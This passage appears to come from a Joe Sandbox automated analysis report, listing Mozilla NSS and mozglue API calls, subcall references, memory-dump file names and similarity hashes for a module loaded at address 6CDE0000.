                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                                                                                      • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                                                                                      • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0fe7c18bd53d9302ea0a5b5704df43701f67b62ebbd898329274930e730dd4bb
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6050f108c7bf42f4a1995b8a96fe48caaf89423692ac4b26e573998c648eab0f
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fe7c18bd53d9302ea0a5b5704df43701f67b62ebbd898329274930e730dd4bb
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED11BEB1B10210DBEB608F14E844B6B77B4AB4531DF14802EE809C7B41D732A918CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE668FB
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6CE66913
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3 ref: 6CE6693E
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE66946
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32 ref: 6CE66951
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE ref: 6CE6695D
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE66968
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1628394932-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e095dc19ac0b47dbd7b618fc45368bab7c40372c7b8ca004177e24b1750474cf
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 362dad2c362b3474b3109303776b8ea864c85de8461ca5ded642afd8d4cce786
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e095dc19ac0b47dbd7b618fc45368bab7c40372c7b8ca004177e24b1750474cf
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52113DB1A246058FEB40AF69C48466EBBF8BF02648F114568D895DB701EB30D494CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE6BDCA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE6BDDB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE6BDEC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC116E
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CE6BE03
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CEB8D2D,?,00000000,?), ref: 6CEBFB85
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEBFBB1
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE6BE22
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE6BE30
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE6BE3B
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1821307800-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f2dc9792ae9c2b4946109077bb7b77a5239f6b1172036d130ae5ad92692a5e7e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10012BA9F8020577F71012A76C02F6776684F5168DF340034FE149AF82FB60D11992B7
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: calloc.MOZGLUE(00000001,00000084,6CE50936,00000001,?,6CE5102C), ref: 6CF298E5
                                                                                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1044
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,00000800,6CE5EF74,00000000), ref: 6CEC1064
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                                                                                      • API String ID: 3379159031-3315324353
                                                                                                                                                                                                                                                                                                                      • Opcode ID: bfd8547cb9b409251f4dece114d4522c2b3a8820a50decb3ce74c459ca850f1c
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a65e7a349227b8e5ba2a99be6caeff01b4011ed108dae3c79ab584446b2de108
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfd8547cb9b409251f4dece114d4522c2b3a8820a50decb3ce74c459ca850f1c
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E014830B502509BE7602FBC8D067563A78BF0374CF21411AE82897B52EB61C114DBD3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CEF1C74
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6CEF1C92
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEF1C99
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6CEF1CCB
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEF1CD2
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3805613680-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 30e7d61ffaf26582b8d68f7592571519cb9d67187e5865ce2f4d0008090b648f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3f58215c77755671c9f622fe7d19522ba36eb9e01c8139192b93bfce221f6385
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30e7d61ffaf26582b8d68f7592571519cb9d67187e5865ce2f4d0008090b648f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E01D6B1F212185FDF58AFE4DC1D74B7778E707718F201024E509A3B40D762920997A6
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF03046
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEEEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEEEE85
                                                                                                                                                                                                                                                                                                                      • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CED7FFB), ref: 6CF0312A
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF03154
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CF02E8B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEEF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CED9BFF,?,00000000,00000000), ref: 6CEEF134
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(8B3C75C0,?,6CED7FFA), ref: 6CF02EA4
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF0317B
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2334702667-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 420d042cbce8fa0422fb206815541a22fb812f9f7fb4884c370cbba840611bae
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6348751dbf5154629c19654a03e1f98841e37d730f6bf75f9bb5408fb650ece3
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 420d042cbce8fa0422fb206815541a22fb812f9f7fb4884c370cbba840611bae
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5A1CE75A002189FDB24CF54CC90BEAB7B5EF49708F148099ED4967741E731AD89CFA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CECED6B
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000000), ref: 6CECEDCE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: malloc.MOZGLUE(6CEB8D2D,?,00000000,?), ref: 6CEC0BF8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: TlsGetValue.KERNEL32(6CEB8D2D,?,00000000,?), ref: 6CEC0C15
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,6CECB04F), ref: 6CECEE46
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CECEECA
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CECEEEA
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CECEEFB
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3768380896-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8a7156b857e598e07c991347ab38525e299636dc1fb6b8edf2520793f74ffba7
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 329516de16646689a0053edaee750f434f6585030dfeac7f9d9ad9e99c682c35
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a7156b857e598e07c991347ab38525e299636dc1fb6b8edf2520793f74ffba7
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44818EB1B006059FEB14CF55DA82BAB7BF5BF49348F24442CE82697751D730E815CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CECDAE2,?), ref: 6CECC6C2
                                                                                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6CECCD35
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF70A27), ref: 6CF29DC6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF70A27), ref: 6CF29DD1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF29DED
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CE61C6F,00000000,00000004,?,?), ref: 6CEB6C3F
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CECCD54
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BF0: TlsGetValue.KERNEL32(?,?,?,6CF70A75), ref: 6CF29C07
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CE61CCC,00000000,00000000,?,?), ref: 6CEB729F
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CECCD9B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CECCE0B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CECCE2C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CECCE40
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECCEE0: PORT_ArenaMark_Util.NSS3(?,6CECCD93,?), ref: 6CECCEEE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CECCD93,?), ref: 6CECCEFC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CECCD93,?), ref: 6CECCF0B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CECCD93,?), ref: 6CECCF1D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CECCD93,?), ref: 6CECCF47
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CECCD93,?), ref: 6CECCF67
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CECCD93,?,?,?,?,?,?,?,?,?,?,?,6CECCD93,?), ref: 6CECCF78
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3748922049-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f4bb246a16fb6e8319f9ef21d83241abb0fddec7fd919009f96fe39e2219aa80
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 82b14f3bc0301d883050dd811f9f080db9aae17a6a2d11dbe7bea4899effdd63
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4bb246a16fb6e8319f9ef21d83241abb0fddec7fd919009f96fe39e2219aa80
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4651A3B6B002009FEB10DF69DE40BAA77F4AF4934CF350528D965A7740EB35E905CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD076,00000000), ref: 6CEDFFE5
